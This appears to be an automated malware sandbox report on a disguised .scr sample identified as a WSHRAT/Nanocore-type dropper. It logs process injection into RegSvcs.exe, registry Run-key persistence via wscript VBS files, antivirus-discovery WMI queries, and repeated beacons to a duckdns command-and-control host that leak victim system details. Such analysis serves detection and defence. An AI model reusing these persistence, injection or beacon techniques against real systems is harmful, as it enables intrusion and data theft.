InternetReadFile Oct. 22, 2021, 9:32 a.m.	buffer: {"status":"success","country":"South Korea","countryCode":"KR","region":"11","regionName":"Seoul","city":"Songpa-dong","zip":"05670","lat":37.508,"lon":127.1177,"timezone":"Asia/Seoul","isp":"Korea Telecom","org":"Kornet","as":"AS4766 Korea Telecom","query":"175.208.134.150"} request_handle: 0x00cc000c	1	1
HttpOpenRequestW Oct. 22, 2021, 9:32 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 22, 2021, 9:30 a.m.	url: http://concideritdone.duckdns.org:5001/is-ready flags: 0	1	1
InternetCrackUrlW Oct. 22, 2021, 9:30 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
InternetCrackUrlA Oct. 22, 2021, 9:30 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
InternetReadFile Oct. 22, 2021, 9:30 a.m.	buffer: {"status":"success","country":"South Korea","countryCode":"KR","region":"11","regionName":"Seoul","city":"Songpa-dong","zip":"05670","lat":37.508,"lon":127.1177,"timezone":"Asia/Seoul","isp":"Korea Telecom","org":"Kornet","as":"AS4766 Korea Telecom","query":"175.208.134.150"} request_handle: 0x00cc000c	1	1
HttpOpenRequestW Oct. 22, 2021, 9:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 22, 2021, 9:31 a.m.	url: http://concideritdone.duckdns.org:5001/is-ready flags: 0	1	1
InternetCrackUrlW Oct. 22, 2021, 9:31 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:31 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
InternetCrackUrlA Oct. 22, 2021, 9:31 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
InternetReadFile Oct. 22, 2021, 9:31 a.m.	buffer: {"status":"success","country":"South Korea","countryCode":"KR","region":"11","regionName":"Seoul","city":"Songpa-dong","zip":"05670","lat":37.508,"lon":127.1177,"timezone":"Asia/Seoul","isp":"Korea Telecom","org":"Kornet","as":"AS4766 Korea Telecom","query":"175.208.134.150"} request_handle: 0x00cc000c	1	1
HttpOpenRequestW Oct. 22, 2021, 9:31 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 22, 2021, 9:32 a.m.	url: http://concideritdone.duckdns.org:5001/is-ready flags: 0	1	1
InternetCrackUrlW Oct. 22, 2021, 9:32 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:32 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
InternetCrackUrlA Oct. 22, 2021, 9:32 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
InternetReadFile Oct. 22, 2021, 9:32 a.m.	buffer: {"status":"success","country":"South Korea","countryCode":"KR","region":"11","regionName":"Seoul","city":"Songpa-dong","zip":"05670","lat":37.508,"lon":127.1177,"timezone":"Asia/Seoul","isp":"Korea Telecom","org":"Kornet","as":"AS4766 Korea Telecom","query":"175.208.134.150"} request_handle: 0x00cc000c	1	1
HttpOpenRequestW Oct. 22, 2021, 9:32 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 5472256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000178	1	0	0

Installs itself for autorun at Windows startup (16 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\EkoHX	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\EkoHX.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\EkoHX	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\EkoHX.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\EkoHX	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\EkoHX.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\EkoHX	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\EkoHX.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\EkoHX	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\EkoHX.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\EkoHX	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\EkoHX.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\EkoHX	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\EkoHX.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\EkoHX	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\EkoHX.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OPAFu	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\OPAFu.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OPAFu	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\OPAFu.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OPAFu	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\OPAFu.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OPAFu	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\OPAFu.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OPAFu	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\OPAFu.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OPAFu	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\OPAFu.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OPAFu	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\OPAFu.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OPAFu	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\OPAFu.vbs"

Executes one or more WMI queries (3 events)

wmi	select * from antivirusproduct
wmi	select * from win32_operatingsystem
wmi	select * from win32_logicaldisk

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Oct. 22, 2021, 9:30 a.m.	buffer: ÿÿÿÿ&û~(ü~Pý~mèÿÿ jHâý~± base_address: 0x7efde000 process_identifier: 812 process_handle: 0x00000178	1	1	0

wscript.exe-based dropper (JScript, VBS) (12 events)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (50 out of 66 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW Oct. 22, 2021, 9:30 a.m.	url: http://concideritdone.duckdns.org:5001/is-ready flags: 0	1	1
InternetCrackUrlW Oct. 22, 2021, 9:30 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
send Oct. 22, 2021, 9:30 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 22, 2021, 9:30 a.m.	buffer: GET /json/ HTTP/1.1 Accept: / Accept-Language: ko User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Encoding: gzip, deflate Host: ip-api.com Connection: Keep-Alive socket: 1092 sent: 259	1	259
send Oct. 22, 2021, 9:30 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlA Oct. 22, 2021, 9:30 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 22, 2021, 9:30 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 22, 2021, 9:30 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2021-10-22\|Visual Basic-v3.4\|KR:South Korea Accept-Encoding: gzip, deflate Host: concideritdone.duckdns.org:5001 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 708 sent: 347	1	347
send Oct. 22, 2021, 9:30 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlW Oct. 22, 2021, 9:31 a.m.	url: http://concideritdone.duckdns.org:5001/is-ready flags: 0	1	1
InternetCrackUrlW Oct. 22, 2021, 9:31 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:31 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
send Oct. 22, 2021, 9:31 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 22, 2021, 9:31 a.m.	buffer: GET /json/ HTTP/1.1 Accept: / Accept-Language: ko User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Encoding: gzip, deflate Host: ip-api.com Connection: Keep-Alive socket: 1200 sent: 259	1	259
send Oct. 22, 2021, 9:31 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlA Oct. 22, 2021, 9:31 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:31 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 22, 2021, 9:31 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 22, 2021, 9:31 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2021-10-22\|Visual Basic-v3.4\|KR:South Korea Accept-Encoding: gzip, deflate Host: concideritdone.duckdns.org:5001 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 408 sent: 347	1	347
send Oct. 22, 2021, 9:31 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlW Oct. 22, 2021, 9:32 a.m.	url: http://concideritdone.duckdns.org:5001/is-ready flags: 0	1	1
InternetCrackUrlW Oct. 22, 2021, 9:32 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:32 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
send Oct. 22, 2021, 9:32 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 22, 2021, 9:32 a.m.	buffer: GET /json/ HTTP/1.1 Accept: / Accept-Language: ko User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Encoding: gzip, deflate Host: ip-api.com Connection: Keep-Alive socket: 476 sent: 259	1	259
send Oct. 22, 2021, 9:32 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlA Oct. 22, 2021, 9:32 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:32 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 22, 2021, 9:32 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 22, 2021, 9:32 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2021-10-22\|Visual Basic-v3.4\|KR:South Korea Accept-Encoding: gzip, deflate Host: concideritdone.duckdns.org:5001 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1204 sent: 347	1	347
send Oct. 22, 2021, 9:32 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlW Oct. 22, 2021, 9:30 a.m.	url: http://concideritdone.duckdns.org:5001/is-ready flags: 0	1	1
InternetCrackUrlW Oct. 22, 2021, 9:30 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
send Oct. 22, 2021, 9:30 a.m.	buffer: ! socket: 1020 sent: 1	1	1
send Oct. 22, 2021, 9:30 a.m.	buffer: GET /json/ HTTP/1.1 Accept: / Accept-Language: ko User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Encoding: gzip, deflate Host: ip-api.com Connection: Keep-Alive socket: 1112 sent: 259	1	259
send Oct. 22, 2021, 9:30 a.m.	buffer: ! socket: 1020 sent: 1	1	1
InternetCrackUrlA Oct. 22, 2021, 9:30 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 22, 2021, 9:30 a.m.	buffer: ! socket: 1020 sent: 1	1	1
send Oct. 22, 2021, 9:30 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2021-10-22\|Visual Basic-v3.4\|KR:South Korea Accept-Encoding: gzip, deflate Host: concideritdone.duckdns.org:5001 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 716 sent: 347	1	347
send Oct. 22, 2021, 9:30 a.m.	buffer: ! socket: 1020 sent: 1	1	1
InternetCrackUrlW Oct. 22, 2021, 9:31 a.m.	url: http://concideritdone.duckdns.org:5001/is-ready flags: 0	1	1
InternetCrackUrlW Oct. 22, 2021, 9:31 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:31 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
send Oct. 22, 2021, 9:31 a.m.	buffer: ! socket: 1020 sent: 1	1	1
send Oct. 22, 2021, 9:31 a.m.	buffer: GET /json/ HTTP/1.1 Accept: / Accept-Language: ko User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Encoding: gzip, deflate Host: ip-api.com Connection: Keep-Alive socket: 1228 sent: 259	1	259
send Oct. 22, 2021, 9:31 a.m.	buffer: ! socket: 1020 sent: 1	1	1

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2256 called NtSetContextThread to modify thread in remote process 812
NtSetContextThread Oct. 22, 2021, 9:30 a.m.	registers.eip: 2000355780 registers.esp: 2490340 registers.edi: 0 registers.eax: 3031726 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000168 process_identifier: 812	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2256 resumed a thread in remote process 812
NtResumeThread Oct. 22, 2021, 9:30 a.m.	thread_handle: 0x00000168 suspend_count: 1 process_identifier: 812	1	0	0

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

Executed a process and injected code into it, probably while unpacking (17 events)

Time & API	Arguments	Status	Return
NtResumeThread Oct. 22, 2021, 9:30 a.m.	thread_handle: 0x0000017c suspend_count: 1 process_identifier: 2648	1	0
CreateProcessInternalW Oct. 22, 2021, 9:30 a.m.	thread_identifier: 2428 thread_handle: 0x00000260 process_identifier: 2076 current_directory: C:\74800197 filepath: C:\74800197\WHS2.0.exe track: 1 command_line: "C:\74800197\WHS2.0.exe" Community portal â€“ Bulletin board, filepath_r: C:\74800197\WHS2.0.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000268	1	1
CreateProcessInternalW Oct. 22, 2021, 9:30 a.m.	thread_identifier: 1332 thread_handle: 0x00000308 process_identifier: 2256 current_directory: C:\74800197 filepath: C:\74800197\wcnaumia.pif track: 1 command_line: "C:\74800197\wcnaumia.pif" fhmoqoe.prw filepath_r: C:\74800197\wcnaumia.pif stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000310	1	1
NtResumeThread Oct. 22, 2021, 9:30 a.m.	thread_handle: 0x000000d0 suspend_count: 1 process_identifier: 2076	1	0
NtResumeThread Oct. 22, 2021, 9:30 a.m.	thread_handle: 0x00000158 suspend_count: 1 process_identifier: 2076	1	0
CreateProcessInternalW Oct. 22, 2021, 9:30 a.m.	thread_identifier: 2856 thread_handle: 0x000002fc process_identifier: 556 current_directory: C:\74800197 filepath: C:\Windows\System32\wscript.exe track: 1 command_line: "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Roaming\EkoHX.vbs filepath_r: C:\Windows\System32\wscript.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000030c	1	1
CreateProcessInternalW Oct. 22, 2021, 9:30 a.m.	thread_identifier: 2576 thread_handle: 0x00000168 process_identifier: 812 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000178	1	1
NtGetContextThread Oct. 22, 2021, 9:30 a.m.	thread_handle: 0x00000168	1	0
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 5472256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000178	1	0
WriteProcessMemory Oct. 22, 2021, 9:30 a.m.	buffer: base_address: 0x00260000 process_identifier: 812 process_handle: 0x00000178	1	1
WriteProcessMemory Oct. 22, 2021, 9:30 a.m.	buffer: ÿÿÿÿ&û~(ü~Pý~mèÿÿ jHâý~± base_address: 0x7efde000 process_identifier: 812 process_handle: 0x00000178	1	1
NtSetContextThread Oct. 22, 2021, 9:30 a.m.	registers.eip: 2000355780 registers.esp: 2490340 registers.edi: 0 registers.eax: 3031726 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000168 process_identifier: 812	1	0
NtResumeThread Oct. 22, 2021, 9:30 a.m.	thread_handle: 0x00000168 suspend_count: 1 process_identifier: 812	1	0
NtResumeThread Oct. 22, 2021, 9:30 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 812	1	0
NtResumeThread Oct. 22, 2021, 9:30 a.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 812	1	0
NtResumeThread Oct. 22, 2021, 9:30 a.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 812	1	0
CreateProcessInternalW Oct. 22, 2021, 9:30 a.m.	thread_identifier: 2892 thread_handle: 0x00000350 process_identifier: 1768 current_directory: C:\74800197 filepath: C:\Windows\System32\wscript.exe track: 1 command_line: "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Roaming\OPAFu.vbs filepath_r: C:\Windows\System32\wscript.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000358	1	1

File has been identified by 34 AntiVirus engines on VirusTotal as malicious (34 events)

Bkav	W32.AIDetect.malware2
Elastic	malicious (high confidence)
ClamAV	Win.Dropper.Nanocore-9900258-0
McAfee	Artemis!4FB831A65CCE
Malwarebytes	Malware.AI.4238168375
Sangfor	Suspicious.Win32.Save.a
K7AntiVirus	Riskware ( 0040eff71 )
BitDefender	AIT.Heur.Lisk.1.398C8E80.Gen
K7GW	Riskware ( 0040eff71 )
Cybereason	malicious.65cce2
Cyren	W32/Trojan.ODRX-0142
ESET-NOD32	a variant of MSIL/TrojanDropper.Agent.DPV
APEX	Malicious
Cynet	Malicious (score: 100)
Kaspersky	UDS:Trojan.MSIL.Dnoper.gen
MicroWorld-eScan	AIT.Heur.Lisk.1.398C8E80.Gen
Avast	Win32:MdeClass
DrWeb	Win32.HLLW.Autoruner3.2234
McAfee-GW-Edition	BehavesLike.Win32.Dropper.tc
FireEye	Generic.mg.4fb831a65cce2392
Sophos	Generic ML PUA (PUA)
Ikarus	Trojan-Spy.FormBook
GData	Gen:Variant.Razy.628496
Avira	TR/Dropper.Gen2
MAX	malware (ai score=86)
Gridinsoft	Ransom.Win32.Wacatac.oa!s1
ZoneAlarm	HEUR:Trojan.MSIL.Dnoper.gen
Microsoft	Worm:Win32/Jenxcus.B
BitDefenderTheta	Gen:NN.ZemsilF.34236.Gm0@aeb33Lh
ALYac	Gen:Variant.Razy.628496
Zoner	Trojan.Win32.92739
SentinelOne	Static AI - Malicious SFX
eGambit	Unsafe.AI_Score_86%
AVG	Win32:MdeClass

DRAFTCOPY-BILL-PDF309874847.scr

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All